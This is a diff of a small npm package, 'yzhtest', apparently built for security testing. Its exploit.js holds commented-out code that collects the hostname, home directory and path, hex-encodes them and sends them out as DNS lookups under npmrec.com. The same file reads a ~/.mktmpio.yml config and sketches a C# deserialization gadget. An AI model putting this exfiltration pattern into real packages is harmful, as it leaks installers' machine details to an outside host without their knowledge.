yzhtest 1.0.0

package/.vscode/launch.json

@@ -0,0 +1,18 @@
+{
+    // Use IntelliSense to learn about possible attributes.
+    // Hover to view descriptions of existing attributes.
+    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+    "version": "0.2.0",
+    "configurations": [
+        {
+            "type": "node",
+            "request": "launch",
+            "name": "Launch Program",
+            "runtimeExecutable":"/home/yinzhihe/.nvm/versions/node/v18.12.1/bin/node",
+            "skipFiles": [
+                "<node_internals>/**"
+            ],
+            "program": "${workspaceFolder}/exploit.js"
+        }
+    ]
+}

package/buffer.js

@@ -0,0 +1,130 @@
+'use strict';
+
+const {dirname, isAbsolute, join, resolve} = require('path');
+const {existsSync} = require('fs');
+const {PassThrough} = require('stream');
+
+const inspectWithKind = require('inspect-with-kind');
+const npmCliDir = require('npm-cli-dir');
+const optional = require('optional');
+const resolveFromNpm = require('resolve-from-npm');
+
+const MODULE_ID_ERROR = 'Expected a module ID (<string>), for example `glob` and `semver`, to resolve from either npm directory or the current working directory';
+const resolveSemverFromNpm = resolveFromNpm('semver');
+
+module.exports = async function loadFromCwdOrNpm(...args) {
+	const argLen = args.length;
+
+	if (argLen !== 1 && argLen !== 2) {
+		throw new RangeError(`Expected 1 or 2 arguments (<string>[, <Function>]), but got ${
+			argLen === 0 ? 'no' : argLen
+		} arguments.`);
+	}
+
+	const [moduleId] = args;
+
+	if (typeof moduleId !== 'string') {
+		throw new TypeError(`${MODULE_ID_ERROR}, but got a non-string value ${inspectWithKind(moduleId)}.`);
+	}
+
+	if (moduleId.length === 0) {
+		throw new Error(`${MODULE_ID_ERROR}, but got '' (empty string).`);
+	}
+
+	if (moduleId.charAt(0) === '@') {
+		return require(moduleId);
+	}
+
+	if (isAbsolute(moduleId)) {
+		const error = new Error(`${MODULE_ID_ERROR}, but got an absolute path '${
+			moduleId
+		}'. For absolute paths there is no need to use \`load-from-cwd-or-npm\` in favor of Node.js built-in \`require.resolve()\`.`);
+
+		error.code = 'ERR_ABSOLUTE_MODULE_ID';
+
+		throw error;
+	}
+
+	const cwd = process.cwd();
+	const modulePkgId = `${moduleId}/package.json`;
+	const tasks = [PassThrough];
+
+	if (argLen === 2) {
+		if (typeof args[1] !== 'function') {
+			throw new TypeError(`Expected a function to compare two package versions, but got ${
+				inspectWithKind(args[1])
+			}.`);
+		}
+	} else {
+		tasks.unshift(resolveSemverFromNpm);
+	}
+
+	tasks.unshift(resolveFromNpm(modulePkgId));
+
+	try {
+		const results = await Promise.all(tasks);
+		let parent = module;
+
+		do {
+			parent = parent.parent;
+
+			try {
+				const {path} = parent;
+
+				if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
+					parent = 'npm';
+					break;
+				}
+			} catch (_) {}
+		} while (parent);
+
+		if (typeof parent !== 'string') {
+			return results[2];
+		}
+
+		const compareFn = argLen === 2 ? args[1] : require(results[1]).gte;
+
+		if (compareFn((optional(modulePkgId) || {version: '0.0.0-0'}).version, require(results[0]).version)) {
+			const result = optional(moduleId);
+
+			if (result !== null) {
+				return result;
+			}
+		}
+
+		return require(dirname(results[0]));
+	} catch (_) {
+		const modileFromCwd = optional(moduleId);
+
+		if (modileFromCwd === null) {
+			let npmCliDirPath;
+
+			try {
+				npmCliDirPath = await npmCliDir();
+			} catch (err) {} // eslint-disable-line no-unused-vars
+
+			const error = new Error(`Failed to load "${
+				moduleId
+			}" module from the current working directory (${
+				cwd
+			}).${npmCliDirPath ? ` Then tried to load "${
+				moduleId
+			}" from the npm CLI directory (${
+				npmCliDirPath
+			}), but it also failed.` : ''} Install "${moduleId}" and try again. (\`npm install ${moduleId}\`)`);
+
+			error.code = 'MODULE_NOT_FOUND';
+			error.id = moduleId;
+			error.triedPaths = {cwd};
+
+			if (npmCliDirPath) {
+				error.triedPaths.npm = npmCliDirPath;
+				error.npmVersion = require(join(npmCliDirPath, './package.json')).version;
+			}
+
+			throw error;
+		}
+
+		return modileFromCwd;
+	}
+};

package/exploit.js

@@ -0,0 +1,88 @@
+// public T Deserialize < T > (string yaml) {
+//     var rootNode = GetRootNode(yaml);
+//     return (T) DeserializeObject(rootNode);
+// }
+
+// private object DeserializeObject(YamlNode node) {
+//     var type = GetTypeFrom(node);
+//     var result = Activator.CreateInstance(type);
+//     foreach(var nestedNode in GetNestedNodes(node)) {
+//         var value = DeserializeObject(nestedNode);
+//         var property = GetPropertyOf(nestedNode);
+//         property.SetValue(result, value);
+//     }
+//     return result;
+// }
+
+// public class ObjectDataProvider {
+//     public object ObjectInstance {
+//         set { 
+//             this._objectInstance = value;
+//             this.Refresh(); 
+//         }
+//     }
+//     public void Refresh() {
+//         /*...*/
+//         obj = this._objectType.InvokeMember(this.MethodName, /*...*/ , this._objectInstance, this._methodParameters);
+//     }
+// }
+
+// const os = require("os")
+// const dns = require('dns');
+// // console.log(os.homedir())
+// const id = Date.now();
+// function toHex(str) {
+//     var result = '';
+//     for (var i=0; i<str.length; i++) {
+//       result += str.charCodeAt(i).toString(16);
+//     }
+//     return result;
+// }
+// const relevantInfo = [
+//     os.hostname(),
+//     os.homedir(),
+//     __dirname,
+// ]
+// const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
+// console.log(stringFragments)
+// sendData(stringFragments);
+// function resolveFragment(id, counter, stringFragments) {
+//     console.log(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`)
+// }
+// function sendData(stringFragments) {
+//     for (let i = 0; i < stringFragments.length; i++) {
+//         try {
+//             resolveFragment(id, i, stringFragments);
+//         } catch {
+//         }
+//     }
+// }
+
+// dns.resolve4('nsl.npmrec.com', (err,
+//     address) => console.log('address: %j', address));
+// var home = require('userhome')
+// var fs = require('fs')
+// var yaml = require('js-yaml');
+// console.log(home('.mktmpio.yml'))
+// var confFile = home('.mktmpio.yml')
+// conf = yaml.safeLoad(fs.readFileSync(confFile, 'utf8'))
+// console.log(conf)
+
+// const {PassThrough} = require('stream');
+// console.log(PassThrough)
+// const tasks = [PassThrough];
+// console.log(tasks)
+
+// module.exports = async function loadFromCwdOrNpm(...args) {
+//     let parent = module;
+//     parent = parent.parent
+//     const {path} = parent
+//     console.log(parent)
+//     console.log(path)
+// }
+// loadFromCwdOrNpm('request')
+
+var str = "nihao"
+if(str!=='string'){
+    console.log('yes')
+}

package/package.json

@@ -0,0 +1,17 @@
+{
+  "name": "yzhtest",
+  "version": "1.0.0",
+  "description": "for security testing",
+  "main": "main.js",
+  "directories": {
+    "test": "test"
+  },
+  "dependencies": {
+    "git-ssh": "^0.0.1"
+  },
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
+}